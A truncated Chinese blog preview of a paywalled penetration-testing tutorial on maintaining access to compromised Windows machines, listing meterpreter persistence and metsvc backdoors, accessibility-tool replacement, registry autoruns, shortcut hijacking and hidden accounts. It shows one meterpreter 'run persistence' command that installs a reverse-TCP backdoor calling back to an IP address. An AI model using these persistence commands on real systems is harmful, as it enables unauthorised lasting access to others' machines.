超级会员免费看
本文详细介绍了在Windows系统中进行权限维持的各种方法,包括使用meterpreter的persistence和metsvc模块,系统工具替换后门(如iexplore.exe、narrator、osk、utilman和notepad),以及利用开机自启动注册表项和快捷方式劫持。此外,还讨论了账号隐藏作为权限维持的一种策略。这些技术在渗透测试和安全研究中非常重要,有助于在不同场景下保持对系统的访问权限。
window权限维持
文章目录
前言
上期讲完了横向移动后,我们拿到了管理员的权限,当我们离开时,下一次要是还想拿到的是管理员的权限呢,难道我们还要继续一波操作提取啥的吗,其实不然,接下来将是最重要的内容,就是我们的权限维持的操作了,对于后渗透阶段都是至关重要。能节约我们渗透的时间,大家要好好复习和巩固啊。
meterpreter权限维持
meterpreter中的权限维持技术有两种
persistence(注册表后门)
metsvc的后门(服务后门)
persistence
persistence模块(杀软会杀掉)
run persistence -S -U -X -i 5 -p 4444 -r 192.168.231.134 -P windows/meterpreter/reverse_tcp(win10,64位)
windows/meterpreter/reverse_tcp(win7,32位)
这里给大家演示一下persistence模块权限维持的内容。其实就是生成一个脚本和注册表,
订阅专栏 解锁全文
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
